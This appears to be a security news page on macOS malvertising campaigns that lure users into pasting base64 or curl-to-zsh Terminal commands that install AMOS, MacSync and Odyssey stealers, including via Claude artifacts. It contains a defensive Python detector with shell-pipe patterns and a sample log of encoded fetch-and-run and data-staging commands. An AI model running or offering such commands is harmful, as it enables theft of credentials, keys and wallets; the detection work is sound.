Malicious Google Search Ads and Forged Apple Pages Trick macOS Users Into Running Terminal Commands
Security researchers reported an active macOS social-engineering campaign that abuses Google Search sponsored results and Google-hosted content (notably docs.google.com, and also business.google.com) to funnel users to forged Apple Support-like pages and other lookalike content (including Medium posts). The pages instruct victims—often searching for “mac cleaner” tools or macOS maintenance tasks like clearing cache—to copy/paste an obfuscated Base64 command into Terminal, which then downloads and executes a follow-on script with the user’s permissions.
Once executed, the payload can enable remote access and data theft, including harvesting sensitive files and SSH keys, and may also deploy additional malware or cryptomining. One report ties the activity to delivery of the AMOS (aka SOMA) stealer, which was observed creating artifacts such as .agent (AppleScript used to run theft), .mainHelper (Mach-O binary), and .pass (password stored in plaintext), and attempting to access user data including Documents and Notes. Researchers also noted the apparent use of compromised, Google-verified advertiser accounts to place the malicious ads, helping the campaign bypass ad-platform trust checks.
Related Stories

ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
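The lures in the lead story and the tradecraft in the ClickFix story above (an `echo <base64> | base64 -D | zsh` stage, a `curl ... | zsh` fetch, the `/tmp/osalogging.zip` staging file and the `.agent`/`.mainHelper`/`.pass` artifacts) are concrete enough to turn into a triage rule over process-execution logs. The Python below is an added example, not code from any of the cited researchers; the log line format, the uid values and the sample base64 payload (which points at the reserved `.invalid` TLD and resolves nowhere) are constructed for the demonstration.

```python
import base64
import re

# Indicators drawn from the reported tradecraft; the artifact names are the ones cited above.
SHELL_PIPE = re.compile(r"\|\s*(?:zsh|bash|sh)\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
CURL_FETCH = re.compile(r"\bcurl\b")
B64_LITERAL = re.compile(r"\becho\s+[\"']?([A-Za-z0-9+/=]{16,})[\"']?")
ARTIFACT_RE = re.compile(r"/tmp/osalogging\.zip|(?:^|[\s/])\.(?:agent|mainHelper|pass)\b")
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+exec:\s+(?P<cmd>.*)$")

def decode_embedded_base64(cmd):
    """Statically decode an `echo <b64> | base64 -D` stage so it can be inspected, never run."""
    m = B64_LITERAL.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass: not real base64
        return None

def triage_command(cmd):
    """Return the indicator names one command line triggers (empty list when nothing matches)."""
    hits = []
    if B64_DECODE.search(cmd) and SHELL_PIPE.search(cmd):
        hits.append("base64-decode-to-shell")
    if CURL_FETCH.search(cmd) and SHELL_PIPE.search(cmd):
        hits.append("curl-to-shell")
    decoded = decode_embedded_base64(cmd)
    # Look one layer deeper: in the reported lures the decoded stage is the curl|zsh fetch.
    if decoded and CURL_FETCH.search(decoded) and SHELL_PIPE.search(decoded):
        hits.append("decoded-stage-curl-to-shell")
    if ARTIFACT_RE.search(cmd) or (decoded and ARTIFACT_RE.search(decoded)):
        hits.append("known-artifact")
    return hits

def scan_log(text):
    """Return (timestamp, uid, indicators) for every exec line that triggers at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and (hits := triage_command(m.group("cmd"))):
            findings.append((m.group("ts"), int(m.group("uid")), hits))
    return findings

# Constructed sample in a simplified "<ts> uid=<n> exec: <cmd>" process-event format.
SAMPLE_LOG = """\
2024-01-01T10:00:01 uid=501 exec: ls -la ~/Library/Caches
2024-01-01T10:00:07 uid=501 exec: echo "Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9zLnNoIHwgenNo" | base64 -D | zsh
2024-01-01T10:00:09 uid=501 exec: curl -fsSL https://example.invalid/s.sh | zsh
2024-01-01T10:00:15 uid=501 exec: zip -r /tmp/osalogging.zip ~/Documents
"""
```

`scan_log(SAMPLE_LOG)` flags three of the four lines and leaves the benign `ls` untouched; in practice the decoded stage is what an analyst wants to see, since the visible command is only an opaque blob.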
4 weeks ago
Malvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites
A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them. Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections. Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets. 
The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.
4 months ago
macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
1 month ago